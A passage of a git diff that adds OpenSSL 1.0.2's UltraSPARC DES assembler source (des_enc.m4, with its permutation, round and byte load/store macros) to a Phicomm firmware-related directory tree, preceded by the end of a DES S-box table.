+	&data_word(0x01004200, 0x00000004, 0x00004004, 0x01004204);
+	&data_word(0x01000004, 0x01004200, 0x01004000, 0x00004004);
+	# nibble 7
+	&data_word(0x20800080, 0x20820000, 0x00020080, 0x00000000);
+	&data_word(0x20020000, 0x00800080, 0x20800000, 0x20820080);
+	&data_word(0x00000080, 0x20000000, 0x00820000, 0x00020080);
+	&data_word(0x00820080, 0x20020080, 0x20000080, 0x20800000);
+	&data_word(0x00020000, 0x00820080, 0x00800080, 0x20020000);
+	&data_word(0x20820080, 0x20000080, 0x00000000, 0x00820000);
+	&data_word(0x20000000, 0x00800000, 0x20020080, 0x20800080);
+	&data_word(0x00800000, 0x00020000, 0x20820000, 0x00000080);
+	&data_word(0x00800000, 0x00020000, 0x20000080, 0x20820080);
+	&data_word(0x00020080, 0x20000000, 0x00000000, 0x00820000);
+	&data_word(0x20800080, 0x20020080, 0x20020000, 0x00800080);
+	&data_word(0x20820000, 0x00000080, 0x00800080, 0x20020000);
+	&data_word(0x20820080, 0x00800000, 0x20800000, 0x20000080);
+	&data_word(0x00820000, 0x00020080, 0x20020080, 0x20800000);
+	&data_word(0x00000080, 0x20820000, 0x00820080, 0x00000000);
+	&data_word(0x20000000, 0x20800080, 0x00020000, 0x00820080);
+	}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/asm/des_enc.m4 b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/asm/des_enc.m4
new file mode 100644
index 0000000..dda08e1
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/asm/des_enc.m4
@@ -0,0 +1,2101 @@
+!  des_enc.m4
+!  des_enc.S  (generated from des_enc.m4)
+!
+!  UltraSPARC assembler version of the LibDES/SSLeay/OpenSSL des_enc.c file.
+!
+!  Version 1.0. 32-bit version.
+!
+!  June 8, 2000.
+!
+!  Version 2.0. 32/64-bit, PIC-ification, blended CPU adaptation
+!		by Andy Polyakov.
+!
+!  January 1, 2003.
+!
+!  Assembler version: Copyright Svend Olaf Mikkelsen.
+!
+!  Original C code: Copyright Eric A. Young.
+!
+!  This code can be freely used by LibDES/SSLeay/OpenSSL users.
+!
+!  The LibDES/SSLeay/OpenSSL copyright notices must be respected.
+!
+!  This version can be redistributed.
+!
+!  To expand the m4 macros: m4 -B 8192 des_enc.m4 > des_enc.S
+!
+!  Global registers 1 to 5 are used. This is the same as done by the
+!  cc compiler. The UltraSPARC load/store little endian feature is used.
+!
+!  Instruction grouping often refers to one CPU cycle.
+!
+!  Assemble through gcc: gcc -c -mcpu=ultrasparc -o des_enc.o des_enc.S
+!
+!  Assemble through cc:  cc -c -xarch=v8plusa -o des_enc.o des_enc.S
+!
+!  Performance improvement according to './apps/openssl speed des'
+!
+!	32-bit build:
+!		23%  faster than cc-5.2 -xarch=v8plus -xO5
+!		115% faster than gcc-3.2.1 -m32 -mcpu=ultrasparc -O5
+!	64-bit build:
+!		50%  faster than cc-5.2 -xarch=v9 -xO5
+!		100% faster than gcc-3.2.1 -m64 -mcpu=ultrasparc -O5
+!
+
+.ident "des_enc.m4 2.1"
+.file  "des_enc-sparc.S"
+
+#include <openssl/opensslconf.h>
+
+#if defined(__SUNPRO_C) && defined(__sparcv9)
+# define ABI64  /* They've said -xarch=v9 at command line */
+#elif defined(__GNUC__) && defined(__arch64__)
+# define ABI64  /* They've said -m64 at command line */
+#endif
+
+#ifdef ABI64
+  .register	%g2,#scratch
+  .register	%g3,#scratch
+# define	FRAME	-192
+# define	BIAS	2047
+# define	LDPTR	ldx
+# define	STPTR	stx
+# define	ARG0	128
+# define	ARGSZ	8
+# ifndef OPENSSL_SYSNAME_ULTRASPARC
+# define OPENSSL_SYSNAME_ULTRASPARC
+# endif
+#else
+# define	FRAME	-96
+# define	BIAS	0
+# define	LDPTR	ld
+# define	STPTR	st
+# define	ARG0	68
+# define	ARGSZ	4
+#endif
+
+#define LOOPS 7
+
+#define global0 %g0
+#define global1 %g1
+#define global2 %g2
+#define global3 %g3
+#define global4 %g4
+#define global5 %g5
+
+#define local0 %l0
+#define local1 %l1
+#define local2 %l2
+#define local3 %l3
+#define local4 %l4
+#define local5 %l5
+#define local7 %l6
+#define local6 %l7
+
+#define in0 %i0
+#define in1 %i1
+#define in2 %i2
+#define in3 %i3
+#define in4 %i4
+#define in5 %i5
+#define in6 %i6
+#define in7 %i7
+
+#define out0 %o0
+#define out1 %o1
+#define out2 %o2
+#define out3 %o3
+#define out4 %o4
+#define out5 %o5
+#define out6 %o6
+#define out7 %o7
+
+#define stub stb
+
+changequote({,})
+
+
+! Macro definitions:
+
+
+! {ip_macro}
+!
+! The logic used in initial and final permutations is the same as in
+! the C code. The permutations are done with a clever shift, xor, and
+! technique.
+!
+! The macro also loads address sbox 1 to 5 to global 1 to 5, address
+! sbox 6 to local6, and addres sbox 8 to out3.
+!
+! Rotates the halfs 3 left to bring the sbox bits in convenient positions.
+!
+! Loads key first round from address in parameter 5 to out0, out1.
+!
+! After the the original LibDES initial permutation, the resulting left
+! is in the variable initially used for right and vice versa. The macro
+! implements the possibility to keep the halfs in the original registers.
+!
+! parameter 1  left
+! parameter 2  right
+! parameter 3  result left (modify in first round)
+! parameter 4  result right (use in first round)
+! parameter 5  key address
+! parameter 6  1/2 for include encryption/decryption
+! parameter 7  1 for move in1 to in3
+! parameter 8  1 for move in3 to in4, 2 for move in4 to in3
+! parameter 9  1 for load ks3 and ks2 to in4 and in3
+
+define(ip_macro, {
+
+! {ip_macro}
+! $1 $2 $4 $3 $5 $6 $7 $8 $9
+
+	ld	[out2+256], local1
+	srl	$2, 4, local4
+
+	xor	local4, $1, local4
+	ifelse($7,1,{mov in1, in3},{nop})
+
+	ld	[out2+260], local2
+	and	local4, local1, local4
+	ifelse($8,1,{mov in3, in4},{})
+	ifelse($8,2,{mov in4, in3},{})
+
+	ld	[out2+280], out4          ! loop counter
+	sll	local4, 4, local1
+	xor	$1, local4, $1
+
+	ld	[out2+264], local3
+	srl	$1, 16, local4
+	xor	$2, local1, $2
+
+	ifelse($9,1,{LDPTR	KS3, in4},{})
+	xor	local4, $2, local4
+	nop	!sethi	%hi(DES_SPtrans), global1 ! sbox addr
+
+	ifelse($9,1,{LDPTR	KS2, in3},{})
+	and	local4, local2, local4
+	nop	!or	global1, %lo(DES_SPtrans), global1   ! sbox addr
+
+	sll	local4, 16, local1
+	xor	$2, local4, $2
+
+	srl	$2, 2, local4
+	xor	$1, local1, $1
+
+	sethi	%hi(16711680), local5
+	xor	local4, $1, local4
+
+	and	local4, local3, local4
+	or	local5, 255, local5
+
+	sll	local4, 2, local2
+	xor	$1, local4, $1
+
+	srl	$1, 8, local4
+	xor	$2, local2, $2
+
+	xor	local4, $2, local4
+	add	global1, 768, global4
+
+	and	local4, local5, local4
+	add	global1, 1024, global5
+
+	ld	[out2+272], local7
+	sll	local4, 8, local1
+	xor	$2, local4, $2
+
+	srl	$2, 1, local4
+	xor	$1, local1, $1
+
+	ld	[$5], out0                ! key 7531
+	xor	local4, $1, local4
+	add	global1, 256, global2
+
+	ld	[$5+4], out1              ! key 8642
+	and	local4, local7, local4
+	add	global1, 512, global3
+
+	sll	local4, 1, local1
+	xor	$1, local4, $1
+
+	sll	$1, 3, local3
+	xor	$2, local1, $2
+
+	sll	$2, 3, local2
+	add	global1, 1280, local6     ! address sbox 8
+
+	srl	$1, 29, local4
+	add	global1, 1792, out3       ! address sbox 8
+
+	srl	$2, 29, local1
+	or	local4, local3, $4
+
+	or	local2, local1, $3
+
+	ifelse($6, 1, {
+
+		ld	[out2+284], local5     ! 0x0000FC00 used in the rounds
+		or	local2, local1, $3
+		xor	$4, out0, local1
+
+		call .des_enc.1
+		and	local1, 252, local1
+
+	},{})
+
+	ifelse($6, 2, {
+
+		ld	[out2+284], local5     ! 0x0000FC00 used in the rounds
+		or	local2, local1, $3
+		xor	$4, out0, local1
+
+		call .des_dec.1
+		and	local1, 252, local1
+
+	},{})
+})
+
+
+! {rounds_macro}
+!
+! The logic used in the DES rounds is the same as in the C code,
+! except that calculations for sbox 1 and sbox 5 begin before
+! the previous round is finished.
+!
+! In each round one half (work) is modified based on key and the
+! other half (use).
+!
+! In this version we do two rounds in a loop repeated 7 times
+! and two rounds seperately.
+!
+! One half has the bits for the sboxes in the following positions:
+!
+!	777777xx555555xx333333xx111111xx
+!
+!	88xx666666xx444444xx222222xx8888
+!
+! The bits for each sbox are xor-ed with the key bits for that box.
+! The above xx bits are cleared, and the result used for lookup in
+! the sbox table. Each sbox entry contains the 4 output bits permuted
+! into 32 bits according to the P permutation.
+!
+! In the description of DES, left and right are switched after
+! each round, except after last round. In this code the original
+! left and right are kept in the same register in all rounds, meaning
+! that after the 16 rounds the result for right is in the register
+! originally used for left.
+!
+! parameter 1  first work (left in first round)
+! parameter 2  first use (right in first round)
+! parameter 3  enc/dec  1/-1
+! parameter 4  loop label
+! parameter 5  key address register
+! parameter 6  optional address for key next encryption/decryption
+! parameter 7  not empty for include retl
+!
+! also compares in2 to 8
+
+define(rounds_macro, {
+
+! {rounds_macro}
+! $1 $2 $3 $4 $5 $6 $7 $8 $9
+
+	xor	$2, out0, local1
+
+	ld	[out2+284], local5        ! 0x0000FC00
+	ba	$4
+	and	local1, 252, local1
+
+	.align 32
+
+$4:
+	! local6 is address sbox 6
+	! out3   is address sbox 8
+	! out4   is loop counter
+
+	ld	[global1+local1], local1
+	xor	$2, out1, out1            ! 8642
+	xor	$2, out0, out0            ! 7531
+	! fmovs	%f0, %f0                  ! fxor used for alignment
+
+	srl	out1, 4, local0           ! rotate 4 right
+	and	out0, local5, local3      ! 3
+	! fmovs	%f0, %f0
+
+	ld	[$5+$3*8], local7         ! key 7531 next round
+	srl	local3, 8, local3         ! 3
+	and	local0, 252, local2       ! 2
+	! fmovs	%f0, %f0
+
+	ld	[global3+local3],local3   ! 3
+	sll	out1, 28, out1            ! rotate
+	xor	$1, local1, $1            ! 1 finished, local1 now sbox 7
+
+	ld	[global2+local2], local2  ! 2 
+	srl	out0, 24, local1          ! 7
+	or	out1, local0, out1        ! rotate
+
+	ldub	[out2+local1], local1     ! 7 (and 0xFC)
+	srl	out1, 24, local0          ! 8
+	and	out1, local5, local4      ! 4
+
+	ldub	[out2+local0], local0     ! 8 (and 0xFC)
+	srl	local4, 8, local4         ! 4
+	xor	$1, local2, $1            ! 2 finished local2 now sbox 6
+
+	ld	[global4+local4],local4   ! 4
+	srl	out1, 16, local2          ! 6
+	xor	$1, local3, $1            ! 3 finished local3 now sbox 5
+
+	ld	[out3+local0],local0      ! 8
+	and	local2, 252, local2       ! 6
+	add	global1, 1536, local5     ! address sbox 7
+
+	ld	[local6+local2], local2   ! 6
+	srl	out0, 16, local3          ! 5
+	xor	$1, local4, $1            ! 4 finished
+
+	ld	[local5+local1],local1    ! 7
+	and	local3, 252, local3       ! 5
+	xor	$1, local0, $1            ! 8 finished
+
+	ld	[global5+local3],local3   ! 5
+	xor	$1, local2, $1            ! 6 finished
+	subcc	out4, 1, out4
+
+	ld	[$5+$3*8+4], out0         ! key 8642 next round
+	xor	$1, local7, local2        ! sbox 5 next round
+	xor	$1, local1, $1            ! 7 finished
+
+	srl	local2, 16, local2        ! sbox 5 next round
+	xor	$1, local3, $1            ! 5 finished
+
+	ld	[$5+$3*16+4], out1        ! key 8642 next round again
+	and	local2, 252, local2       ! sbox5 next round
+! next round
+	xor	$1, local7, local7        ! 7531
+
+	ld	[global5+local2], local2  ! 5
+	srl	local7, 24, local3        ! 7
+	xor	$1, out0, out0            ! 8642
+
+	ldub	[out2+local3], local3     ! 7 (and 0xFC)
+	srl	out0, 4, local0           ! rotate 4 right
+	and	local7, 252, local1       ! 1
+
+	sll	out0, 28, out0            ! rotate
+	xor	$2, local2, $2            ! 5 finished local2 used
+
+	srl	local0, 8, local4         ! 4
+	and	local0, 252, local2       ! 2
+	ld	[local5+local3], local3   ! 7
+
+	srl	local0, 16, local5        ! 6
+	or	out0, local0, out0        ! rotate
+	ld	[global2+local2], local2  ! 2
+
+	srl	out0, 24, local0
+	ld	[$5+$3*16], out0          ! key 7531 next round
+	and	local4, 252, local4	  ! 4
+
+	and	local5, 252, local5       ! 6
+	ld	[global4+local4], local4  ! 4
+	xor	$2, local3, $2            ! 7 finished local3 used
+
+	and	local0, 252, local0       ! 8
+	ld	[local6+local5], local5   ! 6
+	xor	$2, local2, $2            ! 2 finished local2 now sbox 3
+
+	srl	local7, 8, local2         ! 3 start
+	ld	[out3+local0], local0     ! 8
+	xor	$2, local4, $2            ! 4 finished
+
+	and	local2, 252, local2       ! 3
+	ld	[global1+local1], local1  ! 1
+	xor	$2, local5, $2            ! 6 finished local5 used
+
+	ld	[global3+local2], local2  ! 3
+	xor	$2, local0, $2            ! 8 finished
+	add	$5, $3*16, $5             ! enc add 8, dec add -8 to key pointer
+
+	ld	[out2+284], local5        ! 0x0000FC00
+	xor	$2, out0, local4          ! sbox 1 next round
+	xor	$2, local1, $2            ! 1 finished
+
+	xor	$2, local2, $2            ! 3 finished
+#ifdef OPENSSL_SYSNAME_ULTRASPARC
+	bne,pt	%icc, $4
+#else
+	bne	$4
+#endif
+	and	local4, 252, local1       ! sbox 1 next round
+
+! two rounds more:
+
+	ld	[global1+local1], local1
+	xor	$2, out1, out1
+	xor	$2, out0, out0
+
+	srl	out1, 4, local0           ! rotate
+	and	out0, local5, local3
+
+	ld	[$5+$3*8], local7         ! key 7531
+	srl	local3, 8, local3
+	and	local0, 252, local2
+
+	ld	[global3+local3],local3
+	sll	out1, 28, out1            ! rotate
+	xor	$1, local1, $1            ! 1 finished, local1 now sbox 7
+
+	ld	[global2+local2], local2
+	srl	out0, 24, local1
+	or	out1, local0, out1        ! rotate
+
+	ldub	[out2+local1], local1
+	srl	out1, 24, local0
+	and	out1, local5, local4
+
+	ldub	[out2+local0], local0
+	srl	local4, 8, local4
+	xor	$1, local2, $1            ! 2 finished local2 now sbox 6
+
+	ld	[global4+local4],local4
+	srl	out1, 16, local2
+	xor	$1, local3, $1            ! 3 finished local3 now sbox 5
+
+	ld	[out3+local0],local0
+	and	local2, 252, local2
+	add	global1, 1536, local5     ! address sbox 7
+
+	ld	[local6+local2], local2
+	srl	out0, 16, local3
+	xor	$1, local4, $1            ! 4 finished
+
+	ld	[local5+local1],local1
+	and	local3, 252, local3
+	xor	$1, local0, $1
+
+	ld	[global5+local3],local3
+	xor	$1, local2, $1            ! 6 finished
+	cmp	in2, 8
+
+	ifelse($6,{}, {}, {ld	[out2+280], out4})  ! loop counter
+	xor	$1, local7, local2        ! sbox 5 next round
+	xor	$1, local1, $1            ! 7 finished
+
+	ld	[$5+$3*8+4], out0
+	srl	local2, 16, local2        ! sbox 5 next round
+	xor	$1, local3, $1            ! 5 finished
+
+	and	local2, 252, local2
+! next round (two rounds more)
+	xor	$1, local7, local7        ! 7531
+
+	ld	[global5+local2], local2
+	srl	local7, 24, local3
+	xor	$1, out0, out0            ! 8642
+
+	ldub	[out2+local3], local3
+	srl	out0, 4, local0           ! rotate
+	and	local7, 252, local1
+
+	sll	out0, 28, out0            ! rotate
+	xor	$2, local2, $2            ! 5 finished local2 used
+
+	srl	local0, 8, local4
+	and	local0, 252, local2
+	ld	[local5+local3], local3
+
+	srl	local0, 16, local5
+	or	out0, local0, out0        ! rotate
+	ld	[global2+local2], local2
+
+	srl	out0, 24, local0
+	ifelse($6,{}, {}, {ld	[$6], out0})   ! key next encryption/decryption
+	and	local4, 252, local4
+
+	and	local5, 252, local5
+	ld	[global4+local4], local4
+	xor	$2, local3, $2            ! 7 finished local3 used
+
+	and	local0, 252, local0
+	ld	[local6+local5], local5
+	xor	$2, local2, $2            ! 2 finished local2 now sbox 3
+
+	srl	local7, 8, local2         ! 3 start
+	ld	[out3+local0], local0
+	xor	$2, local4, $2
+
+	and	local2, 252, local2
+	ld	[global1+local1], local1
+	xor	$2, local5, $2            ! 6 finished local5 used
+
+	ld	[global3+local2], local2
+	srl	$1, 3, local3
+	xor	$2, local0, $2
+
+	ifelse($6,{}, {}, {ld	[$6+4], out1}) ! key next encryption/decryption
+	sll	$1, 29, local4
+	xor	$2, local1, $2
+
+	ifelse($7,{}, {}, {retl})
+	xor	$2, local2, $2
+})
+
+
+! {fp_macro}
+!
+!  parameter 1   right (original left)
+!  parameter 2   left (original right)
+!  parameter 3   1 for optional store to [in0]
+!  parameter 4   1 for load input/output address to local5/7
+!
+!  The final permutation logic switches the halfes, meaning that
+!  left and right ends up the the registers originally used.
+
+define(fp_macro, {
+
+! {fp_macro}
+! $1 $2 $3 $4 $5 $6 $7 $8 $9
+
+	! initially undo the rotate 3 left done after initial permutation
+	! original left is received shifted 3 right and 29 left in local3/4
+
+	sll	$2, 29, local1
+	or	local3, local4, $1
+
+	srl	$2, 3, $2
+	sethi	%hi(0x55555555), local2
+
+	or	$2, local1, $2
+	or	local2, %lo(0x55555555), local2
+
+	srl	$2, 1, local3
+	sethi	%hi(0x00ff00ff), local1
+	xor	local3, $1, local3
+	or	local1, %lo(0x00ff00ff), local1
+	and	local3, local2, local3
+	sethi	%hi(0x33333333), local4
+	sll	local3, 1, local2
+
+	xor	$1, local3, $1
+
+	srl	$1, 8, local3
+	xor	$2, local2, $2
+	xor	local3, $2, local3
+	or	local4, %lo(0x33333333), local4
+	and	local3, local1, local3
+	sethi	%hi(0x0000ffff), local1
+	sll	local3, 8, local2
+
+	xor	$2, local3, $2
+
+	srl	$2, 2, local3
+	xor	$1, local2, $1
+	xor	local3, $1, local3
+	or	local1, %lo(0x0000ffff), local1
+	and	local3, local4, local3
+	sethi	%hi(0x0f0f0f0f), local4
+	sll	local3, 2, local2
+
+	ifelse($4,1, {LDPTR INPUT, local5})
+	xor	$1, local3, $1
+
+	ifelse($4,1, {LDPTR OUTPUT, local7})
+	srl	$1, 16, local3
+	xor	$2, local2, $2
+	xor	local3, $2, local3
+	or	local4, %lo(0x0f0f0f0f), local4
+	and	local3, local1, local3
+	sll	local3, 16, local2
+
+	xor	$2, local3, local1
+
+	srl	local1, 4, local3
+	xor	$1, local2, $1
+	xor	local3, $1, local3
+	and	local3, local4, local3
+	sll	local3, 4, local2
+
+	xor	$1, local3, $1
+
+	! optional store:
+
+	ifelse($3,1, {st $1, [in0]})
+
+	xor	local1, local2, $2
+
+	ifelse($3,1, {st $2, [in0+4]})
+
+})
+
+
+! {fp_ip_macro}
+!
+! Does initial permutation for next block mixed with
+! final permutation for current block.
+!
+! parameter 1   original left
+! parameter 2   original right
+! parameter 3   left ip
+! parameter 4   right ip
+! parameter 5   1: load ks1/ks2 to in3/in4, add 120 to in4
+!                2: mov in4 to in3
+!
+! also adds -8 to length in2 and loads loop counter to out4
+
+define(fp_ip_macro, {
+
+! {fp_ip_macro}
+! $1 $2 $3 $4 $5 $6 $7 $8 $9
+
+	define({temp1},{out4})
+	define({temp2},{local3})
+
+	define({ip1},{local1})
+	define({ip2},{local2})
+	define({ip4},{local4})
+	define({ip5},{local5})
+
+	! $1 in local3, local4
+
+	ld	[out2+256], ip1
+	sll	out5, 29, temp1
+	or	local3, local4, $1
+
+	srl	out5, 3, $2
+	ifelse($5,2,{mov in4, in3})
+
+	ld	[out2+272], ip5
+	srl	$4, 4, local0
+	or	$2, temp1, $2
+
+	srl	$2, 1, temp1
+	xor	temp1, $1, temp1
+
+	and	temp1, ip5, temp1
+	xor	local0, $3, local0
+
+	sll	temp1, 1, temp2
+	xor	$1, temp1, $1
+
+	and	local0, ip1, local0
+	add	in2, -8, in2
+
+	sll	local0, 4, local7
+	xor	$3, local0, $3
+
+	ld	[out2+268], ip4
+	srl	$1, 8, temp1
+	xor	$2, temp2, $2
+	ld	[out2+260], ip2
+	srl	$3, 16, local0
+	xor	$4, local7, $4
+	xor	temp1, $2, temp1
+	xor	local0, $4, local0
+	and	temp1, ip4, temp1
+	and	local0, ip2, local0
+	sll	temp1, 8, temp2
+	xor	$2, temp1, $2
+	sll	local0, 16, local7
+	xor	$4, local0, $4
+
+	srl	$2, 2, temp1
+	xor	$1, temp2, $1
+
+	ld	[out2+264], temp2         ! ip3
+	srl	$4, 2, local0
+	xor	$3, local7, $3
+	xor	temp1, $1, temp1
+	xor	local0, $3, local0
+	and	temp1, temp2, temp1
+	and	local0, temp2, local0
+	sll	temp1, 2, temp2
+	xor	$1, temp1, $1
+	sll	local0, 2, local7
+	xor	$3, local0, $3
+
+	srl	$1, 16, temp1
+	xor	$2, temp2, $2
+	srl	$3, 8, local0
+	xor	$4, local7, $4
+	xor	temp1, $2, temp1
+	xor	local0, $4, local0
+	and	temp1, ip2, temp1
+	and	local0, ip4, local0
+	sll	temp1, 16, temp2
+	xor	$2, temp1, local4
+	sll	local0, 8, local7
+	xor	$4, local0, $4
+
+	srl	$4, 1, local0
+	xor	$3, local7, $3
+
+	srl	local4, 4, temp1
+	xor	local0, $3, local0
+
+	xor	$1, temp2, $1
+	and	local0, ip5, local0
+
+	sll	local0, 1, local7
+	xor	temp1, $1, temp1
+
+	xor	$3, local0, $3
+	xor	$4, local7, $4
+
+	sll	$3, 3, local5
+	and	temp1, ip1, temp1
+
+	sll	temp1, 4, temp2
+	xor	$1, temp1, $1
+
+	ifelse($5,1,{LDPTR	KS2, in4})
+	sll	$4, 3, local2
+	xor	local4, temp2, $2
+
+	! reload since used as temporar:
+
+	ld	[out2+280], out4          ! loop counter
+
+	srl	$3, 29, local0
+	ifelse($5,1,{add in4, 120, in4})
+
+	ifelse($5,1,{LDPTR	KS1, in3})
+	srl	$4, 29, local7
+
+	or	local0, local5, $4
+	or	local2, local7, $3
+
+})
+
+
+
+! {load_little_endian}
+!
+! parameter 1  address
+! parameter 2  destination left
+! parameter 3  destination right
+! parameter 4  temporar
+! parameter 5  label
+
+define(load_little_endian, {
+
+! {load_little_endian}
+! $1 $2 $3 $4 $5 $6 $7 $8 $9
+
+	! first in memory to rightmost in register
+
+#ifdef OPENSSL_SYSNAME_ULTRASPARC
+	andcc	$1, 3, global0
+	bne,pn	%icc, $5
+	nop
+
+	lda	[$1] 0x88, $2
+	add	$1, 4, $4
+
+	ba,pt	%icc, $5a
+	lda	[$4] 0x88, $3
+#endif
+
+$5:
+	ldub	[$1+3], $2
+
+	ldub	[$1+2], $4
+	sll	$2, 8, $2
+	or	$2, $4, $2
+
+	ldub	[$1+1], $4
+	sll	$2, 8, $2
+	or	$2, $4, $2
+
+	ldub	[$1+0], $4
+	sll	$2, 8, $2
+	or	$2, $4, $2
+
+
+	ldub	[$1+3+4], $3
+
+	ldub	[$1+2+4], $4
+	sll	$3, 8, $3
+	or	$3, $4, $3
+
+	ldub	[$1+1+4], $4
+	sll	$3, 8, $3
+	or	$3, $4, $3
+
+	ldub	[$1+0+4], $4
+	sll	$3, 8, $3
+	or	$3, $4, $3
+$5a:
+
+})
+
+
+! {load_little_endian_inc}
+!
+! parameter 1  address
+! parameter 2  destination left
+! parameter 3  destination right
+! parameter 4  temporar
+! parameter 4  label
+!
+! adds 8 to address
+
+define(load_little_endian_inc, {
+
+! {load_little_endian_inc}
+! $1 $2 $3 $4 $5 $6 $7 $8 $9
+
+	! first in memory to rightmost in register
+
+#ifdef OPENSSL_SYSNAME_ULTRASPARC
+	andcc	$1, 3, global0
+	bne,pn	%icc, $5
+	nop
+
+	lda	[$1] 0x88, $2
+	add	$1, 4, $1
+
+	lda	[$1] 0x88, $3
+	ba,pt	%icc, $5a
+	add	$1, 4, $1
+#endif
+
+$5:
+	ldub	[$1+3], $2
+
+	ldub	[$1+2], $4
+	sll	$2, 8, $2
+	or	$2, $4, $2
+
+	ldub	[$1+1], $4
+	sll	$2, 8, $2
+	or	$2, $4, $2
+
+	ldub	[$1+0], $4
+	sll	$2, 8, $2
+	or	$2, $4, $2
+
+	ldub	[$1+3+4], $3
+	add	$1, 8, $1
+
+	ldub	[$1+2+4-8], $4
+	sll	$3, 8, $3
+	or	$3, $4, $3
+
+	ldub	[$1+1+4-8], $4
+	sll	$3, 8, $3
+	or	$3, $4, $3
+
+	ldub	[$1+0+4-8], $4
+	sll	$3, 8, $3
+	or	$3, $4, $3
+$5a:
+
+})
+
+
+! {load_n_bytes}
+!
+! Loads 1 to 7 bytes little endian
+! Remaining bytes are zeroed.
+!
+! parameter 1  address
+! parameter 2  length
+! parameter 3  destination register left
+! parameter 4  destination register right
+! parameter 5  temp
+! parameter 6  temp2
+! parameter 7  label
+! parameter 8  return label
+
+define(load_n_bytes, {
+
+! {load_n_bytes}
+! $1 $2 $5 $6 $7 $8 $7 $8 $9
+
+$7.0:	call	.+8
+	sll	$2, 2, $6
+
+	add	%o7,$7.jmp.table-$7.0,$5
+
+	add	$5, $6, $5
+	mov	0, $4
+
+	ld	[$5], $5
+
+	jmp	%o7+$5
+	mov	0, $3
+
+$7.7:
+	ldub	[$1+6], $5
+	sll	$5, 16, $5
+	or	$3, $5, $3
+$7.6:
+	ldub	[$1+5], $5
+	sll	$5, 8, $5
+	or	$3, $5, $3
+$7.5:
+	ldub	[$1+4], $5
+	or	$3, $5, $3
+$7.4:
+	ldub	[$1+3], $5
+	sll	$5, 24, $5
+	or	$4, $5, $4
+$7.3:
+	ldub	[$1+2], $5
+	sll	$5, 16, $5
+	or	$4, $5, $4
+$7.2:
+	ldub	[$1+1], $5
+	sll	$5, 8, $5
+	or	$4, $5, $4
+$7.1:
+	ldub	[$1+0], $5
+	ba	$8
+	or	$4, $5, $4
+
+	.align 4
+
+$7.jmp.table:
+	.word	0
+	.word	$7.1-$7.0
+	.word	$7.2-$7.0
+	.word	$7.3-$7.0
+	.word	$7.4-$7.0
+	.word	$7.5-$7.0
+	.word	$7.6-$7.0
+	.word	$7.7-$7.0
+})
+
+
+! {store_little_endian}
+!
+! parameter 1  address
+! parameter 2  source left
+! parameter 3  source right
+! parameter 4  temporar
+
+define(store_little_endian, {
+
+! {store_little_endian}
+! $1 $2 $3 $4 $5 $6 $7 $8 $9
+
+	! rightmost in register to first in memory
+
+#ifdef OPENSSL_SYSNAME_ULTRASPARC
+	andcc	$1, 3, global0
+	bne,pn	%icc, $5
+	nop
+
+	sta	$2, [$1] 0x88
+	add	$1, 4, $4
+
+	ba,pt	%icc, $5a
+	sta	$3, [$4] 0x88
+#endif
+
+$5:
+	and	$2, 255, $4
+	stub	$4, [$1+0]
+
+	srl	$2, 8, $4
+	and	$4, 255, $4
+	stub	$4, [$1+1]
+
+	srl	$2, 16, $4
+	and	$4, 255, $4
+	stub	$4, [$1+2]
+
+	srl	$2, 24, $4
+	stub	$4, [$1+3]
+
+
+	and	$3, 255, $4
+	stub	$4, [$1+0+4]
+
+	srl	$3, 8, $4
+	and	$4, 255, $4
+	stub	$4, [$1+1+4]
+
+	srl	$3, 16, $4
+	and	$4, 255, $4
+	stub	$4, [$1+2+4]
+
+	srl	$3, 24, $4
+	stub	$4, [$1+3+4]
+
+$5a:
+
+})
+
+
+! {store_n_bytes}
+!
+! Stores 1 to 7 bytes little endian
+!
+! parameter 1  address
+! parameter 2  length
+! parameter 3  source register left
+! parameter 4  source register right
+! parameter 5  temp
+! parameter 6  temp2
+! parameter 7  label
+! parameter 8  return label
+
+define(store_n_bytes, {
+
+! {store_n_bytes}
+! $1 $2 $5 $6 $7 $8 $7 $8 $9
+
+$7.0:	call	.+8
+	sll	$2, 2, $6
+
+	add	%o7,$7.jmp.table-$7.0,$5
+
+	add	$5, $6, $5
+
+	ld	[$5], $5
+
+	jmp	%o7+$5
+	nop
+
+$7.7:
+	srl	$3, 16, $5
+	and	$5, 0xff, $5
+	stub	$5, [$1+6]
+$7.6:
+	srl	$3, 8, $5
+	and	$5, 0xff, $5
+	stub	$5, [$1+5]
+$7.5:
+	and	$3, 0xff, $5
+	stub	$5, [$1+4]
+$7.4:
+	srl	$4, 24, $5
+	stub	$5, [$1+3]
+$7.3:
+	srl	$4, 16, $5
+	and	$5, 0xff, $5
+	stub	$5, [$1+2]
+$7.2:
+	srl	$4, 8, $5
+	and	$5, 0xff, $5
+	stub	$5, [$1+1]
+$7.1:
+	and	$4, 0xff, $5
+
+
+	ba	$8
+	stub	$5, [$1]
+
+	.align 4
+
+$7.jmp.table:
+
+	.word	0
+	.word	$7.1-$7.0
+	.word	$7.2-$7.0
+	.word	$7.3-$7.0
+	.word	$7.4-$7.0
+	.word	$7.5-$7.0
+	.word	$7.6-$7.0
+	.word	$7.7-$7.0
+})
+
+
+define(testvalue,{1})
+
+define(register_init, {
+
+! For test purposes:
+
+	sethi	%hi(testvalue), local0
+	or	local0, %lo(testvalue), local0
+
+	ifelse($1,{},{}, {mov	local0, $1})
+	ifelse($2,{},{}, {mov	local0, $2})
+	ifelse($3,{},{}, {mov	local0, $3})
+	ifelse($4,{},{}, {mov	local0, $4})
+	ifelse($5,{},{}, {mov	local0, $5})
+	ifelse($6,{},{}, {mov	local0, $6})
+	ifelse($7,{},{}, {mov	local0, $7})
+	ifelse($8,{},{}, {mov	local0, $8})
+
+	mov	local0, local1
+	mov	local0, local2
+	mov	local0, local3
+	mov	local0, local4
+	mov	local0, local5
+	mov	local0, local7
+	mov	local0, local6
+	mov	local0, out0
+	mov	local0, out1
+	mov	local0, out2
+	mov	local0, out3
+	mov	local0, out4
+	mov	local0, out5
+	mov	local0, global1
+	mov	local0, global2
+	mov	local0, global3
+	mov	local0, global4
+	mov	local0, global5
+
+})
+
+.section	".text"
+
+	.align 32
+
+.des_enc:
+
+	! key address in3
+	! loads key next encryption/decryption first round from [in4]
+
+	rounds_macro(in5, out5, 1, .des_enc.1, in3, in4, retl)
+
+
+	.align 32
+
+.des_dec:
+
+	! implemented with out5 as first parameter to avoid
+	! register exchange in ede modes
+
+	! key address in4
